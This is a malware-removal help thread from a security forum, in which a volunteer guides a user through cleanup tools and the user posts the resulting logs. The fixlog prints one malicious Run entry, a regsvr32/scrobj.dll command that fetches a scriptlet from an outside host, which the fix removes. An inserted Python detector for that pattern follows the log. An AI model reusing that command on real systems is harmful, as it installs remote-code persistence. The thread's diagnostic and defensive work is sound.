Error: (09/19/2017 08:40:54 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-PL742CC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
 
Error: (09/19/2017 08:40:54 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-PL742CC)
Description: The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.
 
Error: (09/19/2017 08:40:52 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_Session5 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/19/2017 08:40:52 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Storage_Session5 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/19/2017 08:40:52 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Contact Data_Session5 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/19/2017 08:40:52 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Sync Host_Session5 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 
Error: (09/19/2017 08:10:36 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-PL742CC)
Description: The server microsoft.windowslive.calendar.AppXwkn9j84yh1kvnt49k5r8h6y1ecsv09hs.mca did not register with DCOM within the required timeout.
 
Error: (09/19/2017 08:10:36 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The User Data Access_Session4 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.
 

CodeIntegrity:
===================================
  Date: 2017-09-19 16:47:15.213
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\amdhdl64.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-19 16:47:15.044
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-18 19:30:55.366
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\amdhdl64.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-18 19:30:55.276
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-13 20:45:04.335
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\amdhdl64.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-13 20:45:04.171
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-10 01:36:15.239
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\amdhdl64.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-10 01:36:14.941
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-08 12:52:29.809
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Windows\System32\amdhdl64.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2017-09-08 12:52:29.654
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.
 

==================== Memory info ===========================
 
Processor: Intel® Core™ i3-6006U CPU @ 2.00GHz
Percentage of memory in use: 68%
Total physical RAM: 3965.14 MB
Available physical RAM: 1267.59 MB
Total Virtual: 4669.14 MB
Available Virtual: 1650.97 MB
 
==================== Drives ================================
 
Drive c: () (Fixed) (Total:100.02 GB) (Free:64.21 GB) NTFS
Drive d: ( ) (Fixed) (Total:276.97 GB) (Free:247.56 GB) NTFS
Drive e: ( ) (Fixed) (Total:276.97 GB) (Free:259.55 GB) NTFS
Drive f: ( ) (Fixed) (Total:277.43 GB) (Free:270.59 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 1C99BC2F)
 
Partition: GPT.
 
==================== End of Addition.txt ============================

 



#3 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • Gender:Male
  • Location:Greenup, Ill USA

Posted 20 September 2017 - 07:17 AM

Hello

  •   Welcome to Bleeping Computer.
  •   My name is fireman4it and I will be helping you with your Malware problem.

    Please take note of some guidelines for this fix:
  •   Refrain from making any changes to your computer including installing/uninstalling programs, deleting files, modifying the registry, and running scanners or tools.
  •   If you do not understand any step(s) provided, please do not hesitate to ask before continuing.
  •   Even if things appear to be better, it might not mean we are finished. Please continue to follow my instructions and reply back until I give you the "all clean".
  •   In the upper right hand corner of the topic you will see a button called Follow This Topic. I suggest you click it and select Immediate E-Mail notification and click on Follow This Topic. This way you will be advised when we respond to your topic and facilitate the cleaning of your machine.
  •   Finally, please reply using the Post button in the lower right hand corner of your screen. Do not start a new topic. The logs that you post should be pasted directly into the reply, unless they do not fit into the post.
  •   I will be analyzing your log. I will get back to you with instructions.

1.

 

 
Download attached fixlist.txt file and save it to the Desktop

NOTE. It's important that both files, FRST/FRST64 and fixlist.txt, are in the same location or the fix will not work.

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

Run FRST/FRST64 and press the Fix button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished, FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

 

Attached File: fixlist.txt (1.08KB)

 

2.

Please download AdwCleaner by Xplode and save to your Desktop.

  • Double-click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select Run As Administrator.
  • The tool will start to update its database...please wait until complete.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • After the scan has finished, click on the Logfile button...a report (AdwCleaner[SX].txt) will open in Notepad (where the largest value of X represents the most recent report).
  • After reviewing the log, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
  • Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
  • A copy of all logfiles is saved to C:\AdwCleaner.

 

Things to include in your next reply:

fixlog.txt

AdwCleaner log

How is the computer running now? Any more signs of the infection?

 

 

 


" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


If I have helped you, consider making a donation to help me continue the fight against Malware!


#4 AbhaySolanki

AbhaySolanki
  • Topic Starter

  • Members
  • 13 posts

Posted 24 September 2017 - 05:20 AM

Fix result of Farbar Recovery Scan Tool (x64) Version: 24-09-2017
Ran by Abhay (24-09-2017 15:32:06) Run:1
Running from C:\Users\Admin\Desktop
Loaded Profiles: Abhay (Available Profiles: Abhay)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server1.aserdefa.ru/deploy.xml scrobj.dll <==== ATTENTION
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.palikan.com/?f=1&a=plk_coinisre_17_30_ssg01&cd=2XzuyEtN2Y1L1Qzu0A0AyC0B0A0DyDtByB0DyE0FtA0Fzy0FtN0D0Tzu0StBtDtAtBtN1L2XzutAtFtByBtFyEtFyDtDtN1L1Czu1TtN1L1G1B1V1N2Y1L1Qzu2SyBtCtBtBtD0CyEyEtGyDtD0A0FtGtA0F0A0AtGtDyDyB0EtGtCtCyCzyyBtA0B0C0B0DtD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyByByBtB0DyC0D0CtGzztD0FyDtGyE0FtBtAtGzzyCyB0DtGtCyC0AzyyD0FtCyBtBzzyE0F2QtN0A0LzuyE&cr=410628304&ir=
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
IE trusted site: HKU\.DEFAULT\...\ncode.in -> hxxps://www.ncode.in
IE trusted site: HKU\.DEFAULT\...\ncodesolutions.com -> hxxps://www.ncodesolutions.com
IE trusted site: HKU\.DEFAULT\...\npay.in -> hxxps://www.npay.in
IE trusted site: HKU\.DEFAULT\...\nprocure.com -> hxxps://nprocure.com
Emptytemp:
*****************
 
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\Software\Microsoft\Windows\CurrentVersion\Run\\COM+ => value removed successfully
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKLM\System\CurrentControlSet\Services\wfpcapture => key removed successfully
wfpcapture => service removed successfully
HKLM\Software\Classes\Directory\Background\ShellEx\ContextMenuHandlers\igfxcui => key removed successfully
HKLM\Software\Classes\CLSID\{3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => key not found.
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ncode.in => key removed successfully
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\ncodesolutions.com => key removed successfully
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\npay.in => key removed successfully
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\nprocure.com => key removed successfully
 
=========== EmptyTemp: ==========
 
BITS transfer queue => 334544 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 93889162 B
Java, Flash, Steam htmlcache => 56599034 B
Windows/system/drivers => 12678574 B
Edge => 2385456945 B
Chrome => 558261399 B
Firefox => 329268475 B
Opera => 0 B
 
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 128 B
systemprofile32 => 0 B
LocalService => 0 B
NetworkService => 26702 B
Admin => 100288041 B
 
RecycleBin => 0 B
EmptyTemp: => 3.3 GB temporary data Removed.
 
================================
# AdwCleaner 7.0.2.1 - Logfile created on Sun Sep 24 10:16:51 2017
# Updated on 2017/29/08 by Malwarebytes
# Database: 09-23-2017.2
# Running on Windows 10 Enterprise (X64)
# Mode: scan
# Support: https://www.malwarebytes.com/support
 
***** [ Services ] *****
 
No malicious services found.
 
***** [ Folders ] *****
 
No malicious folders found.
 
***** [ Files ] *****
 
No malicious files found.
 
***** [ DLL ] *****
 
No malicious DLLs found.
 
***** [ WMI ] *****
 
No malicious WMI found.
 
***** [ Shortcuts ] *****
 
No malicious shortcuts found.
 
***** [ Tasks ] *****
 
No malicious tasks found.
 
***** [ Registry ] *****
 
PUP.Optional.Legacy, [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\solvusoft.com
PUP.Optional.Legacy, [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.solvusoft.com
PUP.Optional.Legacy, [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\solvusoft.com
PUP.Optional.Legacy, [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.solvusoft.com
 

***** [ Firefox (and derivatives) ] *****
 
No malicious Firefox entries.
 
***** [ Chromium (and derivatives) ] *****
 
No malicious Chromium entries.
 
*************************
 
 
 
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt ##########
 

The system needed a reboot.
 
==== End of Fixlog 15:34:40 ====
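The COM+ Run value that the fix above removed is the well-known pattern of regsvr32 being told, through its /i: switch, to have scrobj.dll fetch a scriptlet from a URL. The detector below, an added example that is not part of this thread or of FRST, parses FRST-style Run lines (layout assumed from the fixlog above) and flags that combination; the one malicious line is the page's own, the three benign lookalikes are constructed.

```python
r"""Flag FRST 'Run' autorun entries that use regsvr32 to load a scriptlet through scrobj.dll.

Added example, not FRST's own code. It assumes FRST's autorun line layout as shown
in the fixlog above:  <hive>\...\Run: [<value name>] => <command> [<==== ATTENTION]
"""
import re
from dataclasses import dataclass
from typing import Iterator, List, Tuple

# One FRST autorun line: key ending in \Run or \RunOnce, value name in brackets, then the command.
RUN_LINE = re.compile(
    r"^(?P<key>HK[A-Z]+(?:-x32)?\\\S*?\\Run(?:Once)?): \[(?P<name>[^\]]*)\] => (?P<cmd>.*)$"
)
# regsvr32's /i: switch hands a string to the DLL's DllInstall; for scrobj.dll that string
# is the scriptlet location, which is what turns a signed system tool into a remote loader.
INSTALL_ARG = re.compile(r'/i:\s*"?([^\s"]+)', re.IGNORECASE)
REMOTE_PREFIXES = ("http://", "https://", "hxxp://", "hxxps://", "ftp://", "\\\\")


@dataclass
class Finding:
    key: str
    name: str
    command: str
    scriptlet: str   # location passed via /i:
    remote: bool     # True when that location is a URL or UNC path


def parse_run_entries(frst_text: str) -> Iterator[Tuple[str, str, str]]:
    """Yield (registry key, value name, command) for every Run entry in FRST output."""
    for line in frst_text.splitlines():
        m = RUN_LINE.match(line.strip())
        if m:
            # FRST appends this marker to entries it already considers suspicious; drop it
            # so the command can be compared directly with what sits in the registry.
            cmd = m.group("cmd").replace("<==== ATTENTION", "").strip()
            yield m.group("key"), m.group("name"), cmd


def find_scriptlet_persistence(frst_text: str) -> List[Finding]:
    """Return Run entries that combine regsvr32, scrobj.dll and an /i: scriptlet location."""
    findings: List[Finding] = []
    for key, name, cmd in parse_run_entries(frst_text):
        lowered = cmd.lower()
        if "regsvr32" not in lowered or "scrobj.dll" not in lowered:
            continue  # plain COM registration of a vendor DLL, or not regsvr32 at all
        m = INSTALL_ARG.search(cmd)
        if m is None:
            continue
        target = m.group(1)
        findings.append(Finding(key, name, cmd, target,
                                target.lower().startswith(REMOTE_PREFIXES)))
    return findings


# Constructed sample: the COM+ line is the one from the fixlog above (defanged hxxp kept
# as FRST prints it); the other three are benign lookalikes made up for this example.
SAMPLE_FRST = r"""
HKLM\...\Run: [SecurityHealth] => C:\Windows\system32\SecurityHealthSystray.exe
HKLM\...\Run: [VendorReg] => regsvr32 /s "C:\Program Files\Vendor\vendor.dll"
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server1.aserdefa.ru/deploy.xml scrobj.dll <==== ATTENTION
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\...\Run: [OneDrive] => C:\Users\Abhay\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background
"""

if __name__ == "__main__":
    for f in find_scriptlet_persistence(SAMPLE_FRST):
        print(f"{f.key} [{f.name}] loads scriptlet {f.scriptlet} (remote={f.remote})")
```

The same check can be pointed at a full FRST.txt; a vendor DLL registered with regsvr32 but no scrobj.dll is deliberately left alone.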
 
 
 

 



#5 AbhaySolanki

AbhaySolanki
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  

Posted 24 September 2017 - 05:40 AM

AdwCleaner log
 
 
# AdwCleaner 7.0.2.1 - Logfile created on Sun Sep 24 10:28:01 2017
# Updated on 2017/29/08 by Malwarebytes
# Running on Windows 10 Enterprise (X64)
# Mode: clean
# Support: https://www.malwarebytes.com/support
 
***** [ Services ] *****
 
No malicious services deleted.
 
***** [ Folders ] *****
 
No malicious folders deleted.
 
***** [ Files ] *****
 
No malicious files deleted.
 
***** [ DLL ] *****
 
No malicious DLLs cleaned.
 
***** [ WMI ] *****
 
No malicious WMI cleaned.
 
***** [ Shortcuts ] *****
 
No malicious shortcuts cleaned.
 
***** [ Tasks ] *****
 
No malicious tasks deleted.
 
***** [ Registry ] *****
 
Deleted: [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\solvusoft.com
Deleted: [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.solvusoft.com
Deleted: [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\solvusoft.com
Deleted: [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.solvusoft.com
 

***** [ Firefox (and derivatives) ] *****
 
No malicious Firefox entries deleted.
 
***** [ Chromium (and derivatives) ] *****
 
No malicious Chromium entries deleted.
 
*************************
 
::Tracing keys deleted
::Winsock settings cleared
::Additional Actions: 0
 
 
 
*************************
 
C:/AdwCleaner/AdwCleaner[S0].txt - [1825 B] - [2017/9/24 10:16:51]
 

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt ##########



#6 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:03:56 PM

Posted 27 September 2017 - 06:05 PM

How is your computer running now?


" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#7 AbhaySolanki

AbhaySolanki
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  

Posted 28 September 2017 - 06:44 AM

Perfect as it was.



#8 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:03:56 PM

Posted 28 September 2017 - 07:48 PM

Ok, let's run one more check for any remaining leftovers.

 

 

Emsisoft Emergency Kit

  • Click here to download Emsisoft Emergency Kit. The download will automatically start after a moment.
  • Save EmsisoftEmergencyKit.exe to your Desktop.
  • Double click on EmsisoftEmergencyKit.exe (Windows Vista/7/8 users: Accept UAC warning if it is enabled).
  • Leave everything as it is, then click Extract. This will unpack Emsisoft Emergency Kit to the EEK folder located in the root drive (usually C:\).
  • Once the extraction is done, an icon will appear on your Desktop. Double click it to start Emsisoft Emergency Kit.
  • Wait for Emsisoft Emergency Kit to finish loading signatures.
  • Choose Yes, then wait for EEK to finish updating.
  • Choose Malware Scan under the Scan button. When EEK asks to activate PUP detection, choose Yes.
  • Wait for the scan to finish.
  • If EEK detects something, all detected items will be displayed. Place a checkmark before everything, then choose Quarantine Selected.
  • If Emsisoft Emergency Kit asks to reboot, please do so immediately.
  • The scan log is located in Logs -> Scan Logs. Click on the entry of the latest scan, choose Export and save the report on your Desktop.
  • Please Copy and Paste the contents of the scan log in your next reply.


" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#9 AbhaySolanki

AbhaySolanki
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  

Posted 29 September 2017 - 12:09 AM

Emsisoft Emergency Kit - Version 2017.8
Forensics log
 
Date Component Action Details
29/09/2017 10:12:38 AM Scanner Scan finished Scanned 142784 objects and found nothing.
29/09/2017 10:06:16 AM User Update Downloaded and installed 27 files (3244 kb) (1 min. 58 sec.).
29/09/2017 10:04:59 AM User DESKTOP-PL742CC\Abhay Scan started Malware Scan
29/09/2017 10:04:22 AM User DESKTOP-PL742CC\Abhay Setting modified "Detect PUPs" has been changed to "Enabled".
29/09/2017 10:04:19 AM Core Notification "Recommended Reading:New in 2017.8: Windows Firewall Fortification".
29/09/2017 10:04:10 AM User Update Failed with error "Server returned error" (0 sec.).


#10 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:03:56 PM

Posted 29 September 2017 - 07:23 AM

Since there are no signs of infection anymore in your logs, and you just told me that there are no more issues left to address, I guess we're done here. We'll wrap it up by running DelFix to delete the tools and logs that were used in this clean-up.

DelFix
Follow the instructions below to download and execute DelFix.

  • Download DelFix and move the executable to your Desktop
  • Right-click on DelFix.exe and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Check the following options:
    • Activate UAC
    • Remove disinfection tools
    • Create registry backup
    • Purge system restore
    • Reset system settings
  • Once all the options mentioned above are checked, click on Run
  • After DelFix is done running, a log will open. Please copy/paste the content of the output log in your next reply

Tips, tricks, advice and recommendations

Now it's time to give you some tips, tricks, advice and recommendations on how to protect your system and prevent you from being infected in the future. This is where I'll explain basic security measures that you should take to protect and harden your system, and also make sure it stays as safe and secure as possible against hackers and malware. You are free to ignore the recommendations listed below, although I obviously do not recommend it. If you have any questions about one of the points covered in the speech below, feel free to ask me your questions here directly so I can answer them and guide you.

Windows Updates

Keeping Windows up to date is one of the first steps in having a safe and secure system. The Security Updates that Windows receives are meant to fix exploits and flaws in it, which makes it more secure and not exploitable by hackers. In order to do that, you should always install the Security Updates, known as "Important Updates", on your Windows system. These updates are released on the second Tuesday of every month, but some are also released earlier if they are emergency/critical Security Updates. Let's make sure that you have all your Important Updates and Recommended Updates installed and that your Windows Updates are set to be installed automatically.


Keeping your programs up-to-date

Like keeping Windows updated, keeping your installed programs up-to-date is another important step in having a safe and secure system. Outdated programs can be exploited by hackers and malware to infect a system and take it over. This is especially true today with the rise of Exploit Kits (and also 0-days), which are one of the biggest attack vectors used to distribute malware. Therefore, you should always keep vulnerable programs like Adobe Flash Player, Adobe Shockwave Player, Java, Silverlight, Google Chrome, Mozilla Firefox, VLC Media Player, etc. updated to their most recent version (even better, you don't have to install them if you don't use them). Programs like UCheck, Secunia PSI and Heimdal Free will scan your system for outdated programs, and help you identify them, as well as update them.


Anti-Virus, Anti-Malware, Firewall and Anti-Exploit/Ransomware

Having a decent security setup (which also includes an Anti-Virus) is the most crucial step to protect a system. These programs are a layer of defence that will prevent a system from being infected, or if it somehow ends up infected, help mitigate the infection and remediate it. Ideally, you should have on your system one Antivirus (never more than one installed at a time), one Antimalware (you can install multiple of these, assuming they do not conflict with each other and the other security programs installed), one Firewall and, if you wish, one Anti-Exploit and/or Anti-Ransomware (since Ransomware is currently the most dangerous threat around and it can hit anywhere). Here are a few programs worth checking out if you don't have one yet.

Note: The programs listed below are all free to use or they have some sort of trial. Some of them have a paid version that provides more features, while a lot of other good programs only have a paid version but aren't listed there (such as Kaspersky and ESET Antivirus products).

Anti-Virus


Anti-Malware


  • Malwarebytes - Has both a free and paid version. The Premium version of Malwarebytes also offers Exploit and Ransomware protection, for a complete package of: Malware, Web, Exploit and Ransomware protection
  • HitmanPro 3 - Free 30 day trial
  • Zemana AntiMalware - Free 30 day trial

Firewall
Starting in Windows Vista, the Windows Firewall greatly improved and will satisfy the needs of most users. If you do not have an Internet Suite Antivirus program (which includes a firewall) and you want to use a 3rd party firewall, you can consider the options below.


  • GlassWire - Has both a free and paid version (with different packages)
  • Windows Firewall Control - Gives you more control over your Windows Firewall
  • TinyWall - Lightweight firewall implementing the Windows Firewall and giving you more control over it

Anti-Exploit/Anti-Ransomware


Web Browsers and Web Browsing

Web Browsers could be considered the closest door between malware and your system. This is where most malware goes through to infect a system, and therefore it should be the program(s) you want to secure the most. There are two ways of going about it: hardening your web browser via extensions, and having good browsing habits.

Hardening your web browser means installing extensions that will help it protect itself (and your system at the same time) against Exploit Kits, MiTM attacks, etc., and also protect you. Here are a few extensions that I recommend you install.


  • uBlock Origin: Efficient multi-purpose blocker that is lightweight on RAM and CPU usage (Google Chrome, Mozilla Firefox, Microsoft Edge, Opera and most Chromium and Firefox-based browsers)
  • HTTPS Everywhere: Extension that converts your HTTP (unencrypted) requests to HTTPS (encrypted) ones (Google Chrome, Mozilla Firefox and Opera)
  • Web of Trust: Website reputation, rating and review extension that will help you quickly identify bad and suspicious sites from good ones (every web browser)
  • NoScript: NoScript is a script blocker (Java, Flash, JavaScript, etc.) for Mozilla Firefox and Firefox-based browsers (Mozilla Firefox and Firefox-based web browsers)
  • uMatrix: For advanced users, a point-and-click matrix-like extension that allows you to control requests made on a webpage (based on source, destination and type) (Google Chrome, Mozilla Firefox and Opera)
  • LastPass: Secure password manager allowing you to create, manage, and use passwords you save in your LastPass account (every web browser)

As for safe browsing habits, you can find tons of guides, tutorials, articles, etc. online that will highlight the basics you need to follow (only visit websites you trust, do not click on ads, do not download files from untrusted sources, use a password manager, always verify the URL of a website and make sure it's correctly typed, etc.), and even what you can do if you want to take it a step further (create a fake email address for spam emails, browse the web in a privacy mode, etc.). Here are a few:

As you can see, there are plenty of resources out there. Simply Googling "good browsing habits" or "safe browsing habits" should allow you to find a lot of them.

Other recommendations

Even if you follow every recommendation that I listed here, in the end, it's also your job to be careful when browsing the web and downloading files if you don't want to get infected. Therefore, if you use your brain (common sense) when browsing the web, downloading programs and files, etc., you have a far lower chance of getting infected by malware. If, for example, you're not sure whether a website is legitimate, whether a file is safe to download and execute, or if a program looks "too good" to be free, I suggest you avoid going to that website, downloading that file or using that program.

Here are a few guides, tutorials, articles, etc. that you could read in order to learn more about computer protection and security to improve your current computer protection setup but also improve your good web browsing and computer usage practices:

The End!

And that's it! Now that you know more about how to protect your computer and secure it, you're good to go back to your online activities, but in a safe and secure way! You are also free to stay on the forums and ask for help in different topics if you ever need to. Just make sure that you post your question/issue in the right section to get the best assistance possible. And if you ever get infected again (which I hope you won't!), you can always come back to this section to get another checkup with one of our trained malware removal members.

Do you have any questions before I close this thread?

 


" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#11 AbhaySolanki

AbhaySolanki
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  

Posted 29 September 2017 - 08:56 AM

 
 
 
# DelFix v1.013 - Logfile created 29/09/2017 at 19:24:11
# Updated 17/04/2016 by Xplode
# Username : Abhay - DESKTOP-PL742CC
# Operating System : Windows 10 Enterprise  (64 bits)
 
~ Activating UAC ... OK
 
~ Removing disinfection tools ...
 
Deleted : C:\FRST
Deleted : C:\AdwCleaner
Deleted : C:\Users\Admin\Downloads\FRST-OlderVersion
Deleted : C:\Users\Admin\Downloads\Addition.txt
 
~ Creating registry backup ... OK
 
~ Cleaning system restore ...
 
Deleted : RP #1 [Scheduled Checkpoint | 09/27/2017 18:10:44]
Deleted : RP #2 [Yo(1) | 09/28/2017 11:44:48]
 
New restore point created !
 
~ Resetting system settings ... OK
 
########## - EOF - ##########



#12 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:03:56 PM

Posted 29 September 2017 - 08:59 AM

Any more questions before I close this topic?


" Extinguishing Malware from the world"

